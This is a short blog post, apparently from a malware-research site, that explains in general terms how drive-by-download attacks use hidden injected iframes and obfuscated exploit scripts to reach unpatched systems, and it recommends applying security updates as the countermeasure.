MalwareIntelligence is a site dedicated to research on all matters relating to anti-malware security, criminology computing and information security in general, always from a perspective closely related to the field of intelligence.

15.1.09

One of the most common problems faced by most of the information environment is poor management of security updates both the operating system as installed applications. And, with the same level of criticality, one of the most effective attacks that result from the lack of updating, is one that runs through the web, called Drive-by-Download.

This attack is based on exploiting vulnerabilities that allow malicious code to run through the injection of labels iframe embedded in the body of the HTML code, similar to the example shown in the image:

The label iframe runs in the background, transparently for the user to open a second page that usually contains a script obfuscated code hidden within the one or more exploits in charge of search the computer any specific vulnerability.It can happen that when the user enters a malicious website or committed to these threats, visualize, for example, what is shown in the following screen (just a series of points):

However, looking at the page source code, we see the real code that maliciously hides. This attack technique poses a potential risk, because if a system has the features you need the attack, it will be successful.Therefore, the countermeasures that effectively mitigates these malicious actions is the implementation of security updates, both operating system and applications.